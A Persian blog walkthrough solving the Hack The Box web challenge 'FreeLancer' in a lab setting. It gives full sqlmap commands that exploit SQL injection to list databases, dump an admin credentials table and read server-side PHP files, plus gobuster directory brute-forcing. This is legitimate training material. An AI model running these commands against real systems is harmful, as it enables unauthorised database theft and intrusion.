حل چالش Hack The Box – قسمت سوم (FreeLancer)

حل چالش Hack The Box – قسمت سوم (FreeLancer)

با یکی دیگر از مقالات آموزشی و اینبار با موضوع حل چالش Hack the box با شما هستیم
در قسمت سوم قصد داریم یکی دیگر از چالش های این سایت یعنی چالش FreeLancer رو با هم حل کنیم، با ما همراه باشید !

سایت Hack The Box

Hack The Box یک پلتفرم آنلاین است که به شما امکان می دهد
مهارت های تست نفوذ خود را محک بزنید و ایده ها و روش ها را با سایر اعضای مورد علاقه خود تبادل کنید.
این شامل چندین چالش است که به طور مداوم به روز می شوند. برخی از آنها شبیه سازی سناریوهای دنیای واقعی و برخی دیگر بیشتر به یک سبک چالش CTF متمایل هستند.

• به عنوان یک فرد می توانید برای اثبات مهارت های خود یک چالش ساده انجام دهید
  و سپس یک حساب کاربری ایجاد کنید، به شما امکان می دهد به شبکه خصوصی (HTB Net) ما متصل شوید
  جایی که چندین ماشین در انتظار هک آنها است. با هک کردن ماشین ها امتیازاتی کسب می کنید که به شما کمک می کند در رتبه بندی پیشرفت کنید.

چرا باید از Hack The Box استفاده کنید ؟

باید از Hack The Box استفاده کنید و وقتی از آن خسته میشوید تازه شروع به سرگرم کردن شما میکند
و مکانی عالی برای تمرین و آزمایش مهارت های خود است. بعلاوه عدم نیاز شما به خرید یا ساخت سیستم دیگری.

• به نحوه ای میتوان گفت : هک در یک محیط کاملا قانونی بدون اینکه خطری شما رو تهدید کند.

بریم برای شروع کار

ابتدا در سایت لاگین میکنیم و از منوی سمت چپ وارد قسمت Challenges میشویم و از این قسمت وارد قسمت Web می شویم.

سپس وارد چالش FreeLancer شوید و روی گرینه Start Instance کلیک نمایید .در ادامه به ما یک لینک میدهد که آن را باید برداشته و داخل مرورگر وارد کنیم.

خب به ما یک سایت داده شده و از ما خواسته شده تا امنیت وبسایت را بررسی کنیم و از مشکلات امنیتی وبسایت استفاده کنیم و Flag را پیدا کنیم.

با کلیک راست روی صفحه وبسایت و زدن گزینه View Source Page وارد سورس فرانت این سایت میشویم نکته ای ما را به شک برمیدارد چند لینک هستند که کامنت شده اند

بیایم یکی از لینک ها رو بررسی کنیم.

اوه بله این لینک ها در وبسایت موجود هستند با توجه به اینکه یک ورودی get دارد میگیرد احتمال وجود آسیب پذیری Sql Injection وجود دارد بیاید بررسی کنیم.

بله سایت هدف دارای آسیب پذیری Sql Injection هست  بیایم باهم به سراغ کالی و ابزار SqlMap بریم تا ببینیم میتوانیم اطلاعات دیتابیس وبسایت را Fetch کنیم.

خب من وارد ابزار Sqlmap میشم و با استفاده از دستور زیر اقدام به Fetch دیتابیس این سایت میکنم.

sqlmap -u http://178.128.40.217:32762/portfolio.php?id=1 --dbs 

بله مشاهده میکنید که ما توانستیم دیتابیس های سایت را دربیاوریم
با توجه که سه دیتابیس آخری پیشفرض Mysql هستند، پس تنها دیتابیس اولی یعنی FreeLancer به کار ما می آید.

حال بیایم جداول دیتابیس FreeLancer را به بیرون بکشیم.

sqlmap -u http://178.128.40.217:32762/portfolio.php?id=1 -D freelancer --tables 

خب به ما دو جدول دیتابیس میدهد که باتوجه به اسامی به دنبال اطلاعات جدول SafeAdmin می رویم و اطلاعات اون رو بیرون میکشیم.

sqlmap -u http://178.128.40.217:32762/portfolio.php?id=1 -D freelancer -T safeadmin --dump 

در ادامه..

به ما یوزرنیم و پسورد مدیر وبسایت را میدهد اما بنده متاسفانه نتونستم این نوع از انکریپت که احتمالا انکریپت unix باشه رو دیکریپت کنم.

• بهتره بیایم باز بررسی کنیم و ببینیم داخل این سایت چه مسیرهایی وجود دارد پس بیایم با استفاده از ابزار Gobuster این کارو کنیم برای نصب این ابزار داخل کالی از دستور زیر استفاده میکنیم.

 apt-get install gobuster 

حال با استفاده از این ابزار که یک ابزار Page Finder هست با استفاده از  حملات بروت فورس به دنبال مسیرهای این سایت میگردیم.

gobuster dir -u http://178.128.40.217:32762 -w /usr/share/wordlists/dirb/common.txt

همینطور که مشاهده میکنید چند مسیر را به ما نشان میدهد اما با توجه به Status Code آنها تنها یک تا دو مسیر برای ما قابل دسترسی هستند خب بیایم و مسیر Administrat رو برداریم و آن را بررسی کنیم.

بله این مسیر مسیر صفحه لاگین هست که متاسفانه ما نتوانستیم پسورد آن را دیکریپت کنیم
پس بیایم و با استفاده از Sqlmap سعی کنیم کدهای سمت سرور index.php این مسیر را واکشی کنیم.

sqlmap -u http://178.128.40.217:32762/portfolio.php?id=1 -file-read /var/www/html/administrat/index.php 

به مسیر ذخیره فایل دانلود شده میرویم و سورس سمت سرور این صفحه را بررسی میکنیم.

Path : root/.local/share/sqlmap/output

بعد به دایرکتوری files میرویم و فایل index.php را بررسی میکنیم و مشاهد میکنیم
که داخل سورس دو مسیر panel.php و include/config.php وجود دارد که باید این دو مسیر را بررسی کنیم.

اول به سراغ panel.php میریم و سورس این قسمت را واکشی میکنیم.

sqlmap -u http://178.128.40.217:32762/portfolio.php?id=1 -file-read /var/www/html/administrat/panel.php 

حال سورس این قسمت را بررسی مبکنیم. بله Flag ما داخل تگ H1 وجود دارد و ما توانسیم این چالش را حل کنیم.

و در آخر امیدوارم از این چالش و حل آن لذت برده باشید و ما برای تکمیل کردن مطالب و درک بهتر آن ویدئوی آموزشی آن (چالش FreeLancer) را در اول پست قرار داده ایم میتوانید برای تماشای ویدئو اقدام کنید یا از قسمت باکس دانلود اقدام به دانلود ویدئو کنید.

حل چالش Hack The Box – قسمت دوم (Emdee five for life) کلیک کنید !